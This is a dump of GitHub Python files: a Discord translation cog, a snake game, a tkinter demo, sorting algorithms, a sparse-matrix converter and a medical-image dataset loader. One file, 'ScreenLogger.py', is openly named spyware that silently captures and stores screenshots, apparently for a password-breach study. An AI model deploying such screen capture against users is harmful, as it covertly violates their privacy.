\"sm\",\n        \"scots-gaelic\": \"gd\",\n        \"serbian\": \"sr\",\n        \"sesotho\": \"st\",\n        \"shona\": \"sn\",\n        \"sindhi\": \"sd\",\n        \"sinhala\": \"si\",\n        \"slovak\": \"sk\",\n        \"slovenian\": \"sl\",\n        \"somali\": \"so\",\n        \"spanish\": \"es\",\n        \"sundanese\": \"su\",\n        \"swahili\": \"sw\",\n        \"swedish\": \"sv\",\n        \"tajik\": \"tg\",\n        \"tamil\": \"ta\",\n        \"telugu\": \"te\",\n        \"thai\": \"th\",\n        \"turkish\": \"tr\",\n        \"ukrainian\": \"uk\",\n        \"urdu\": \"ur\",\n        \"uzbek\": \"uz\",\n        \"vietnamese\": \"vi\",\n        \"welsh\": \"cy\",\n        \"xhosa\": \"xh\",\n        \"yiddish\": \"yi\",\n        \"yoruba\": \"yo\",\n        \"zulu\": \"zu\",\n        \"Filipino\": \"fil\",\n        \"Hebrew\": \"he\",\n    }\n\n    @commands.command(aliases=[\"ttl\"])\n    async def translatetextlanguage(self, ctx, language, *, message):\n        \"\"\"Translates a provided message into the specified language.\"\"\"\n        try:\n            tmsg = self.translator.translate(message, dest=language)\n            embed = discord.Embed()\n            embed.color = 0x1ED4E0\n            embed.description = tmsg.text\n        except ValueError:\n            embed = discord.Embed()\n            embed.color = self.bot.error_color\n            embed.title = \"Invalid language. Use [p]languages for the usable languages.\"\n        await ctx.send(embed=embed)\n\n    @commands.command()\n    async def languages(self, ctx):\n        \"\"\"List of languages.\"\"\"\n        desc = \"\"\n        for lang in self.languagelist:\n            desc += f\"```{lang}: {self.languagelist[lang]}```\\u200b\"\n\n        embed = discord.Embed()\n        embed.title = \"Use the codes on the right for the translate command.\"\n        embed.color = 0x1ED4E0\n        embed.description = desc\n        await ctx.author.send(embed=embed)\n        await ctx.send(f\"{ctx.author.mention}, sent you a dm with the list!\")\n\n\ndef setup(bot):\n    bot.add_cog(TranslateToLanguage(bot))\n","repo_name":"Blackcluemodmail/Suggest","sub_path":"translatetolanguage/translatetolanguage.py","file_name":"translatetolanguage.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"5311899309","text":"# import\nimport pygame\nimport random\nfrom sys import exit\nfrom food import Food\nfrom snake import Snake\n\n# init\npygame.init()\n# variable\nNb_col=10\nNb_Row=15\nCell_size=40\n\nwindow=pygame.display.set_mode(size=(Nb_col*Cell_size,Nb_Row*Cell_size))\nrunning=True\nclock=pygame.time.Clock()\n\nfont=pygame.font.Font(\"3AB0DB_3_0.ca19d9b3.ttf\",32)\n# font.render(\"hello\",True,pygame.Color(\"green\"),pygame.Color(\"black\"))\n\n# timer\nscreen_update=pygame.USEREVENT\npygame.time.set_timer(screen_update,200)\n# # characters\n# food=Food(window,Cell_size,Nb_col,Nb_Row)\n# snake=Snake(window,Cell_size)\n\ndef show_grid():\n    for i in range(0,Nb_col):\n        for j in range(0,Nb_Row):\n            rect=pygame.Rect(i*Cell_size,j*Cell_size,Cell_size,Cell_size)\n            pygame.draw.rect(window,pygame.Color(\"black\"),rect,1)\nclass Game():\n    
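\"\"\"Own the food and snake objects, advance movement, and check collisions and game-over.\"\"\"\n    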
def __init__(self):\n        # characters\n        self.food=Food(window,Cell_size,Nb_col,Nb_Row)\n        self.snake=Snake(window,Cell_size)\n        self.generate_food()\n    def update(self):\n        self.snake.move_snake()\n        self.collide()\n        self.game_over()\n\n    \n    def draw_elements(self):\n        self.food.draw_food()\n        self.snake.draw_snake()\n    def collide(self):\n        snake_length=len(self.snake.body)\n        snake_head_block=self.snake.body[snake_length-1]\n        food_block=self.food.block\n        if snake_head_block.x==food_block.x and snake_head_block.y==food_block.y:\n            self.generate_food()\n        else:\n            self.snake.body.pop(0)\n    \n    def game_over(self):\n        snake_length=len(self.snake.body)\n        snake_head=self.snake.body[snake_length-1]\n        if snake_head.x not in range(0,Nb_col) or snake_head.y not in range(0,Nb_Row):\n            print(\"game_over\")\n            # font.render(\"hello\",pygame.Color(\"green\"),pygame.Color(\"black\"))\n            pygame.quit()\n            exit()\n        for block in self.snake.body[0:snake_length-1]:\n            if block.x==snake_head.x and block.y==snake_head.y:\n                print(\"game_over\")\n                # font.render(\"hello\",pygame.Color(\"green\"),pygame.Color(\"black\"))\n                pygame.quit()\n                exit()\n\n\n\n\n    def generate_food(self):\n        self.food=Food(window,Cell_size,Nb_col,Nb_Row)\n        should_generate=True\n        while should_generate:\n            count=0\n            for block in self.snake.body:\n                if block.x==self.food.block.x and block.y==self.food.block.y: \n                    count+=1\n            if count==0:\n                should_generate=False\n            else:\n                self.food=Food(window,Cell_size,Nb_col,Nb_Row) \ngame=Game()\n# main loop\nwhile running:\n    for event in pygame.event.get():\n        if event.type==pygame.QUIT:\n            running=False\n            pygame.quit()\n            exit()\n        elif event.type==pygame.KEYDOWN:\n            if event.key==pygame.K_RIGHT:\n                game.snake.direction=\"right\"\n            elif event.key==pygame.K_LEFT:\n                game.snake.direction=\"left\"\n            elif event.key==pygame.K_UP:\n                game.snake.direction=\"top\"\n            elif event.key==pygame.K_DOWN:\n                game.snake.direction=\"down\"\n        elif event.type==screen_update:\n            game.update()\n    window.fill(pygame.Color(\"white\"))\n    show_grid()\n\n    game.draw_elements()\n\n    pygame.display.flip()\n    clock.tick(60)\n    ","repo_name":"Cephcode/Projets_recent","sub_path":"snake_game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"15945251465","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nroot = Tk()\nroot.title(\"Menu\")\nroot.geometry('400x400')\n\nmyMenu = Menu(root)\nroot.config(menu=myMenu)\n\ndef fileNew():\n    hideAllFrames()\n    fileNewFrame.pack(fill=\"both\", expand=True)\n\ndef editCut():\n    hideAllFrames()\n    editCutFrame.pack(fill=\"both\", expand=True)\n\n# Hide all frames function\ndef hideAllFrames():\n    fileNewFrame.pack_forget()\n    editCutFrame.pack_forget()\n\n# Create a menu item\n\nfileMenu = Menu(myMenu, tearoff=0)\nmyMenu.add_cascade(label=\"File\", menu=fileMenu)\nfileMenu.add_command(label=\"New\", command=fileNew)\nfileMenu.add_separator()\nfileMenu.add_command(label=\"Exit\", command=root.quit)\n\n# Create an edit menu item\neditMenu = Menu(myMenu, tearoff=0)\nmyMenu.add_cascade(label=\"Edit\", menu=editMenu)\neditMenu.add_command(label=\"Cut\", command=editCut)\neditMenu.add_command(label=\"Copy\")\n\n# Create some frames\nfileNewFrame = Frame(root, width=400, height=400, bg=\"red\")\neditCutFrame = Frame(root, width=400, height=400, bg=\"blue\")\n\n\nroot.mainloop()","repo_name":"smamirov/tkinterTutorial","sub_path":"menuFrame.py","file_name":"menuFrame.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"26647755293","text":"__all__ = [\"Daemon\", \"main\", \"config_load\"]\r\n\r\nfrom os.path import join, dirname, exists\r\nfrom configparser import ConfigParser\r\nfrom pyautogui import screenshot\r\nfrom os import makedirs, environ\r\nfrom sys import argv, exit\r\nfrom typing import List\r\nfrom time import sleep\r\nfrom glob import glob\r\n\r\n\r\nclass CONFIGURATIONS:\r\n\r\n    \"\"\"\r\n    This class contains configurations.\r\n    \"\"\"\r\n\r\n    save_filename: str = \"screenshot*.png\"\r\n    save_dirname: str = \"Spywares/screenshots\"\r\n    screenshot_interval: int = 3600\r\n\r\n\r\n
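# A sample screenSpy.conf matching the keys read below (illustrative values):\r\n#   [SAVE]\r\n#   filename = screenshot*.png\r\n#   dirname = Spywares/screenshots\r\n#   [TIME]\r\n#   screenshot_interval = 3600\r\n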
def config_load(filename: str = None, argv: List[str] = argv) -> int:\r\n\r\n    \"\"\"\r\n    This function loads the configuration using the configuration file.\r\n    \"\"\"\r\n\r\n    CONFIG = ConfigParser()\r\n    default_file_name = \"screenSpy.conf\"\r\n\r\n    default_file_path = join(dirname(__file__), default_file_name)\r\n    env_config_file = environ.get(default_file_name)\r\n    arg_config_file = argv[1] if len(argv) == 2 else None\r\n\r\n    if filename is not None and exists(filename):\r\n        CONFIG.read(filename)\r\n    elif arg_config_file is not None and exists(arg_config_file):\r\n        CONFIG.read(arg_config_file)\r\n    elif env_config_file and exists(env_config_file):\r\n        CONFIG.read(env_config_file)\r\n    elif exists(default_file_path):\r\n        CONFIG.read(default_file_path)\r\n    else:\r\n        return 1\r\n\r\n    CONFIG = CONFIG.__dict__[\"_sections\"]\r\n    CONFIGURATIONS.save_filename = CONFIG.get(\"SAVE\", {}).get(\r\n        \"filename\", \"screenshot*.png\"\r\n    )\r\n    CONFIGURATIONS.save_dirname = CONFIG.get(\"SAVE\", {}).get(\r\n        \"dirname\", \"screenshots\"\r\n    )\r\n    CONFIGURATIONS.screenshot_interval = float(\r\n        CONFIG.get(\"TIME\", {}).get(\"screenshot_interval\", \"3600\")\r\n    )\r\n    return 0\r\n\r\n\r\nclass Daemon:\r\n\r\n    \"\"\"\r\n    This class implements a loop to capture the screen\r\n    while the spyware is running.\r\n    \"\"\"\r\n\r\n    def __init__(self):\r\n        self.interval = CONFIGURATIONS.screenshot_interval\r\n        self.run = True\r\n        path = self.path = join(\r\n            CONFIGURATIONS.save_dirname, CONFIGURATIONS.save_filename\r\n        )\r\n        self.increment = len(glob(path))\r\n\r\n    def run_for_ever(self) -> None:\r\n\r\n        \"\"\"\r\n        This function takes a screenshot (the periodic loop is commented out).\r\n        \"\"\"\r\n\r\n        makedirs(CONFIGURATIONS.save_dirname, exist_ok=True)\r\n        increment = self.increment\r\n        # interval = self.interval\r\n        screenshot(self.path.replace(\"*\", str(increment)))\r\n\r\n        # while self.run:\r\n        #     screenshot(self.path.replace(\"*\", str(increment)))\r\n        #     increment += 1\r\n        #     if self.run:\r\n        #         sleep(interval)\r\n\r\n\r\ndef main(config_filename: str = None, argv: List[str] = argv) -> int:\r\n\r\n    \"\"\"\r\n    This function executes this script from the command line.\r\n    \"\"\"\r\n\r\n    config_load(filename=config_filename, argv=argv)\r\n\r\n    daemon = Daemon()\r\n\r\n    try:\r\n        daemon.run_for_ever()\r\n    except KeyboardInterrupt:\r\n        daemon.run = False\r\n\r\n    return 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    
exit(main())\r\n","repo_name":"Rtiwary-1/Graphical-Password-Authenticator-breach-using-spywares","sub_path":"Spywares/ScreenLogger.py","file_name":"ScreenLogger.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25756986001","text":"def quicksort(xs):\n if len(xs) <= 1:\n return xs\n\n pivot_index = len(xs) // 2\n pivot = xs[pivot_index]\n del xs[pivot_index]\n\n smaller = [_ for _ in xs if _ <= pivot]\n larger = [_ for _ in xs if _ > pivot]\n\n return quicksort(smaller) + [pivot] + quicksort(larger)\n\n\ndef mergesort(xs):\n def merge(xs, ys):\n zs = []\n while xs or ys:\n if xs and ys:\n x = xs[0]\n y = ys[0]\n if x <= y:\n zs += [x]\n xs = xs[1:]\n else:\n zs += [y]\n ys = ys[1:]\n elif xs:\n zs += xs\n break\n elif ys:\n zs += ys\n break\n return zs\n\n if len(xs) <= 1:\n return xs\n\n middle_index = len(xs) // 2\n left = xs[:middle_index]\n right = xs[middle_index:]\n\n return merge(mergesort(left), mergesort(right))\n\n\ndef selectionsort(xs):\n def swap(i, j):\n tmp = xs[i]\n xs[i] = xs[j]\n xs[j] = tmp\n\n def find_min_index(start_index):\n min_index = start_index\n for i in range(sorted_index, len(xs)):\n if xs[i] < xs[min_index]:\n min_index = i\n return min_index\n\n for sorted_index in range(len(xs)):\n # Ensure that all xs before `sorted_index` are sorted.\n assert xs[:sorted_index] == sorted(xs[:sorted_index])\n min_index = find_min_index(sorted_index)\n if min_index != sorted_index:\n swap(sorted_index, min_index)\n\n return xs\n","repo_name":"dbader/data-structures-py","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"27214183329","text":"from data.data_builder import DataBuilder\r\nfrom data.data_manager import *\r\nfrom auto_complete import *\r\n\r\n\r\ndef prepare_data(path):\r\n data = DataBuilder()\r\n try:\r\n sentences, sum_lines = build_data(path, data)\r\n print(\"complete reading sentences\")\r\n print(f\"read {sum_lines} lines\")\r\n save_data(sentences, \"/data/sentences.json\")\r\n except MemoryError:\r\n pass\r\n\r\n save_data(data.get_trie(), \"/data/data.json\")\r\n\r\n\r\ndef start():\r\n while True:\r\n sub_seq = input(\"The system is ready, insert your text:\")\r\n while sub_seq[-1] != END_INPUT:\r\n completes = get_best_complete(sub_seq, TRIE)\r\n print(\"here are {} suggestions:\".format(len(completes)))\r\n for i in range(len(completes)):\r\n print(f\"{i + 1}.\", completes[i])\r\n sub_seq += input(\"\\n\" + sub_seq)\r\n\r\n\r\nif __name__ == '__main__':\r\n # prepare_data(\"/2021-archive/python-3.8.4-docs-text/c-api\")\r\n start()\r\n","repo_name":"channamakover/Google-Project","sub_path":"Google project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30866885909","text":"#! 
/usr/bin/env python3\r\n#\r\ndef ccs_print ( m, n, ncc, icc, ccc, acc, title ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_print() prints a sparse matrix in CCS format.\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Input:\r\n#\r\n# integer M, the number of rows in the matrix.\r\n#\r\n# integer N, the number of columns in the matrix.\r\n#\r\n# integer NCC, the number of elements.\r\n#\r\n# integer ICC(NCC), the rows.\r\n#\r\n# integer CCC(N+1), the compressed columns.\r\n#\r\n# real ACC(NCC), the values.\r\n#\r\n# character TITLE, a title.\r\n#\r\n print ( '' )\r\n print ( title )\r\n print ( ' # I J A' )\r\n print ( ' ---- ---- ---- --------------' )\r\n print ( '' )\r\n\r\n if ( ccc[0] == 0 ):\r\n\r\n j = 0\r\n for k in range ( 0, ncc ):\r\n i = icc[k]\r\n while ( ccc[j+1] <= k ):\r\n j = j + 1\r\n print ( ' %4d %4d %4d %16.8g' % ( k, i, j, acc[k] ) )\r\n#\r\n# Matrix uses 1-based indexing.\r\n#\r\n else:\r\n\r\n j = 1\r\n for k in range ( 0, ncc ):\r\n i = icc[k]\r\n while ( ccc[j] <= k + 1 ):\r\n j = j + 1\r\n print ( ' %4d %4d %4d %16.8g' % ( k + 1, i, j, acc[k] ) )\r\n\r\n return\r\n\r\ndef ccs_to_st ( m, n, ncc, icc, ccc, acc ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st() converts sparse matrix information from CCS to ST format.\r\n#\r\n# Discussion:\r\n#\r\n# Only JST actually needs to be computed. The other three output \r\n# quantities are simply copies. \r\n# \r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license. \r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Input:\r\n#\r\n# integer M, the number of rows.\r\n#\r\n# integer N, the number of columns.\r\n#\r\n# integer NCC, the number of elements.\r\n#\r\n# integer ICC(NCC), the rows.\r\n#\r\n# integer CCC(N+1), the compressed columns.\r\n#\r\n# real ACC(NCC), the values.\r\n#\r\n# Output:\r\n#\r\n# integer NST, the number of ST elements.\r\n#\r\n# integer IST(NST), JST(NST), the ST rows and columns.\r\n#\r\n# real AST(NST), the ST values.\r\n#\r\n import numpy as np\r\n\r\n ist = np.copy ( icc )\r\n jst = np.zeros ( ncc, dtype = np.int )\r\n ast = np.copy ( acc )\r\n\r\n nst = 0\r\n\r\n if ( ccc[0] == 0 ):\r\n\r\n jlo = 0\r\n jhi = n - 1\r\n \r\n for j in range ( jlo, jhi + 1 ):\r\n\r\n klo = ccc[j]\r\n khi = ccc[j+1]\r\n\r\n for k in range ( klo, khi ):\r\n\r\n jst[nst] = j\r\n nst = nst + 1\r\n\r\n else:\r\n\r\n ist = ist - 1\r\n\r\n jlo = 0\r\n jhi = n - 1\r\n \r\n for j in range ( jlo, jhi + 1 ):\r\n\r\n klo = ccc[j] - 1\r\n khi = ccc[j+1] - 1\r\n\r\n for k in range ( klo, khi ):\r\n\r\n jst[nst] = j\r\n nst = nst + 1\r\n\r\n return nst, ist, jst, ast\r\n\r\ndef ccs_to_st_test01 ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st_test01() tests ccs_to_st() using a 1-based matrix.\r\n#\r\n# Discussion:\r\n#\r\n# This test uses a trivial matrix whose full representation is:\r\n#\r\n# 2 3 0 0 0\r\n# 3 0 4 0 6\r\n# A = 0 -1 -3 2 0\r\n# 0 0 1 0 0\r\n# 0 4 2 0 1\r\n#\r\n# The 1-based CCS representation is\r\n#\r\n# # ICC CCC ACC\r\n# -- --- --- ---\r\n# 1 1 1 2\r\n# 2 2 3\r\n#\r\n# 3 1 3 3\r\n# 4 3 -1\r\n# 5 5 4\r\n#\r\n# 6 2 6 4\r\n# 7 3 -3\r\n# 8 4 1\r\n# 9 5 2\r\n#\r\n# 10 3 10 2\r\n#\r\n# 11 2 11 6\r\n# 12 5 1\r\n#\r\n# 13 * 13\r\n#\r\n# 
Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n\r\n m = 5\r\n n = 5\r\n ncc = 12\r\n\r\n acc = np.array ( [ \\\r\n 2.0, 3.0, \\\r\n 3.0, -1.0, 4.0, \\\r\n 4.0, -3.0, 1.0, 2.0, \\\r\n 2.0, \\\r\n 6.0, 1.0 ] )\r\n\r\n ccc = np.array ( [ \\\r\n 1, 3, 6, 10, 11, 13 ] )\r\n\r\n icc = np.array ( [ \\\r\n 1, 2, \\\r\n 1, 3, 5, \\\r\n 2, 3, 4, 5, \\\r\n 3, \\\r\n 2, 5 ] )\r\n\r\n print ( '' )\r\n print ( 'ccs_to_st_test01()' )\r\n print ( ' Convert a 1-based CCS matrix to ST format.' )\r\n#\r\n# Print the CCS matrix.\r\n#\r\n ccs_print ( m, n, ncc, icc, ccc, acc, ' The CCS matrix:' )\r\n#\r\n# Convert it.\r\n#\r\n nst, ist, jst, ast = ccs_to_st ( m, n, ncc, icc, ccc, acc )\r\n#\r\n# Print the ST matrix.\r\n#\r\n st_print ( m, n, nst, ist, jst, ast, ' The ST matrix:' )\r\n\r\n return\r\n\r\ndef ccs_to_st_test02 ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st_test02() tests ccs_to_st() using a 0-based matrix.\r\n#\r\n# Discussion:\r\n#\r\n# This test uses a trivial matrix whose full representation is:\r\n#\r\n# 2 3 0 0 0\r\n# 3 0 4 0 6\r\n# A = 0 -1 -3 2 0\r\n# 0 0 1 0 0\r\n# 0 4 2 0 1\r\n#\r\n# The 0-based CCS representation is\r\n#\r\n# # ICC CCC ACC\r\n# -- --- --- ---\r\n# 0 0 0 2\r\n# 1 1 3\r\n#\r\n# 2 0 2 3\r\n# 3 2 -1\r\n# 4 4 4\r\n#\r\n# 5 1 5 4\r\n# 6 2 -3\r\n# 7 3 1\r\n# 8 4 2\r\n#\r\n# 9 2 9 2\r\n#\r\n# 10 1 10 6\r\n# 11 4 1\r\n#\r\n# 12 * 12\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n\r\n m = 5\r\n n = 5\r\n ncc = 12\r\n\r\n acc = np.array ( [ \\\r\n 2.0, 3.0, \\\r\n 3.0, -1.0, 4.0, \\\r\n 4.0, -3.0, 1.0, 2.0, \\\r\n 2.0, \\\r\n 6.0, 1.0 ] )\r\n\r\n ccc = np.array ( [ \\\r\n 0, 2, 5, 9, 10, 12 ] )\r\n\r\n icc = np.array ( [ \\\r\n 0, 1, \\\r\n 0, 2, 4, \\\r\n 1, 2, 3, 4, \\\r\n 2, \\\r\n 1, 4 ] )\r\n\r\n print ( '' )\r\n print ( 'ccs_to_st_test02():' )\r\n print ( ' Convert a 0-based CCS matrix to ST format.' )\r\n#\r\n# Print the CCS matrix.\r\n#\r\n ccs_print ( m, n, ncc, icc, ccc, acc, ' The CCS matrix:' )\r\n#\r\n# Convert it.\r\n#\r\n nst, ist, jst, ast = ccs_to_st ( m, n, ncc, icc, ccc, acc )\r\n#\r\n# Print the ST matrix.\r\n#\r\n st_print ( m, n, nst, ist, jst, ast, ' The ST matrix:' )\r\n\r\n return\r\n\r\ndef ccs_to_st_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## ccs_to_st_test() tests ccs_to_st().\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'ccs_to_st_test():' )\r\n print ( ' Python version: ' + platform.python_version ( ) )\r\n print ( ' Test ccs_to_st().' )\r\n\r\n ccs_to_st_test01 ( )\r\n ccs_to_st_test02 ( )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'ccs_to_st_test():' )\r\n print ( ' Normal end of execution.' 
)\r\n\r\n return\r\n\r\ndef st_print ( m, n, nst, ist, jst, ast, title ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## st_print() prints an ST matrix.\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license.\r\n#\r\n# Modified:\r\n#\r\n# 22 June 2022\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Input:\r\n#\r\n# integer M, the number of rows.\r\n#\r\n# integer N, the number of columns.\r\n#\r\n# integer NST, the number of nonzeros.\r\n#\r\n# integer IST(NST), JST(NST), the row and column indices.\r\n#\r\n# real AST(NST), the nonzero values.\r\n#\r\n# string TITLE, a title.\r\n#\r\n print ( '' )\r\n print ( title )\r\n print ( ' %d rows by %d columns' % ( m, n ) )\r\n print ( '' );\r\n\r\n for k in range ( 0, nst ):\r\n print ( ' %8d %8d %8d %16.8f' % ( k, ist[k], jst[k], ast[k] ) )\r\n\r\n return\r\n\r\ndef timestamp ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## timestamp() prints the date as a timestamp.\r\n#\r\n# Licensing:\r\n#\r\n# This code is distributed under the GNU LGPL license. \r\n#\r\n# Modified:\r\n#\r\n# 21 August 2019\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import time\r\n\r\n t = time.time ( )\r\n print ( time.ctime ( t ) )\r\n\r\n return\r\n\r\nif ( __name__ == '__main__' ):\r\n timestamp ( )\r\n ccs_to_st_test ( )\r\n timestamp ( )","repo_name":"jjeongGrp/MathSubroutines","sub_path":"Python3/ccs_to_st.py","file_name":"ccs_to_st.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21135939913","text":"import os\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nfrom skimage import transform\nfrom utils.Config import opt\nimport matplotlib.pylab as plt\nfrom sklearn.model_selection import train_test_split\nimport utils.array_tool as at\nimport matplotlib.patches as patches\nfrom data.data_utils import read_image\n\nDSB_BBOX_LABEL_NAMES = ('p') # Pneumonia\n\n\ndef inverse_normalize(img):\n if opt.caffe_pretrain:\n img = img + (np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1))\n return img[::-1, :, :].clip(min=0, max=255)\n # approximate un-normalize for visualize\n return (img * 0.225 + 0.45).clip(min=0, max=1) * 255\n\n\"\"\"Transforms:\nData augmentation\n\"\"\"\nclass Transform(object):\n def __init__(self, img_size):\n self.img_size = img_size\n\n def __call__(self, in_data):\n img_id, img, mask = in_data['img_id'], in_data['image'], in_data['mask']\n _, H, W = img.shape\n img, mask = preprocess(img, mask, self.img_size)\n\n return {'img_id': img_id, 'image': img.copy(), 'mask': mask.copy()}\n\n\ndef preprocess(img, mask, img_size):\n C, H, W = img.shape\n img = img / 255.\n img = transform.resize(img, (C, img_size, img_size), mode='reflect')\n mask = mask.astype(np.float32)\n mask = transform.resize(mask, (1, img_size, img_size), mode='reflect')\n # both the longer and shorter should be less than\n # max_size and min_size\n if opt.caffe_pretrain:\n normalize = caffe_normalize\n else:\n normalize = pytorch_normalze\n\n img = normalize(img)\n\n return img, mask\n\ndef pytorch_normalze(img):\n \"\"\"\n https://discuss.pytorch.org/t/how-to-preprocess-input-for-pre-trained-networks/683\n https://github.com/pytorch/vision/issues/223\n return appr -1~1 RGB\n \"\"\"\n normalize = transforms.Normalize(mean=[0.485, 0.456, 
0.406],\n std=[0.229, 0.224, 0.225])\n img = normalize(torch.from_numpy(img))\n return img.numpy()\n\n\ndef caffe_normalize(img):\n \"\"\"\n return appr -125-125 BGR\n \"\"\"\n img = img[[2, 1, 0], :, :] # RGB-BGR\n img = img * 255\n mean = np.array([122.7717, 115.9465, 102.9801]).reshape(3, 1, 1)\n img = (img - mean).astype(np.float32, copy=True)\n return img\n\nclass RSNADataset(Dataset):\n def __init__(self, root_dir, img_id, mask_id, transform=True):\n \"\"\"\n Args:\n :param root_dir (string): Directory with all the images\n :param img_id (list): lists of image id\n :param train: if equals true, then read training set, so the output is image, mask and imgId\n if equals false, then read testing set, so the output is image and imgId\n :param transform (callable, optional): Optional transform to be applied on a sample\n \"\"\"\n self.root_dir = root_dir\n self.img_id = img_id\n self.mask_id = mask_id\n self.transform = transform\n self.tsf = Transform(opt.img_size)\n\n def __len__(self):\n return len(self.img_id)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.root_dir, 'images', self.img_id[idx].split('.')[0], 'image.png')\n mask_path = os.path.join(self.root_dir, 'masks', self.mask_id[idx])\n image = read_image(img_path, np.float32, False)\n mask = read_image(mask_path, np.uint8, False)\n\n sample = {'img_id': self.img_id[idx], 'image':image.copy(), 'mask':mask.copy()}\n\n if self.transform:\n sample = self.tsf(sample)\n\n return sample\n\n\nclass RSNADatasetTest(Dataset):\n def __init__(self, root_dir, transform=True):\n \"\"\"\n Args:\n :param root_dir (string): Directory with all the images\n :param img_id (list): lists of image id\n :param train: if equals true, then read training set, so the output is image, mask and imgId\n if equals false, then read testing set, so the output is image and imgId\n :param transform (callable, optional): Optional transform to be applied on a sample\n \"\"\"\n self.root_dir = root_dir\n self.img_id = os.listdir(root_dir)\n self.transform = transform\n self.tsf = Transform(opt.img_size)\n\n def __len__(self):\n return len(self.img_id)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.root_dir, self.img_id[idx], 'image.png')\n image = read_image(img_path, np.float32, False)\n\n C, H, W = image.shape\n image = image / 255.\n image = transform.resize(image, (C, opt.img_size, opt.img_size), mode='reflect')\n if opt.caffe_pretrain:\n normalize = caffe_normalize\n else:\n normalize = pytorch_normalze\n\n image = normalize(image)\n\n sample = {'img_id': self.img_id[idx], 'image': image.copy()}\n\n return sample\n\ndef get_train_loader(root_dir, batch_size=16, shuffle=False, num_workers=4, pin_memory=False):\n\n \"\"\"Utility function for loading and returning training and validation Dataloader\n :param root_dir: the root directory of data set\n :param batch_size: batch size of training and validation set\n :param split: if split data set to training set and validation set\n :param shuffle: if shuffle the image in training and validation set\n :param num_workers: number of workers loading the data, when using CUDA, set to 1\n :param val_ratio: ratio of validation set size\n :param pin_memory: store data in CPU pin buffer rather than memory. 
when using CUDA, set to True\n :return:\n - train_loader: Dataloader for training\n \"\"\"\n img_ids = os.listdir(root_dir)\n img_ids.sort()\n transformed_dataset = RSNADataset(root_dir=root_dir, img_id=img_ids, transform=True)\n dataloader = DataLoader(transformed_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n return dataloader\n\ndef get_train_val_loader(root_dir, batch_size=16, val_ratio=0.2, shuffle=False, num_workers=4, pin_memory=False):\n\n \"\"\"Utility function for loading and returning training and validation Dataloader\n :param root_dir: the root directory of data set\n :param batch_size: batch size of training and validation set\n :param split: if split data set to training set and validation set\n :param shuffle: if shuffle the image in training and validation set\n :param num_workers: number of workers loading the data, when using CUDA, set to 1\n :param val_ratio: ratio of validation set size\n :param pin_memory: store data in CPU pin buffer rather than memory. when using CUDA, set to True\n :return:\n - train_loader: Dataloader for training\n - valid_loader: Dataloader for validation\n \"\"\"\n df = pd.read_csv(os.path.join(opt.root_dir, 'train.csv'))\n img_id, mask_id = list(df['image']), list(df['label'])\n train_img_id, val_img_id, train_mask_id, val_mask_id = train_test_split(img_id, mask_id, random_state=42, test_size=val_ratio, shuffle=False)\n\n train_dataset = RSNADataset(root_dir=root_dir, img_id=train_img_id, mask_id=train_mask_id, transform=True)\n train_loader = DataLoader(train_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n val_dataset = RSNADataset(root_dir=root_dir, img_id=val_img_id, mask_id=val_mask_id, transform=True)\n val_loader = DataLoader(val_dataset, batch_size=batch_size,\n 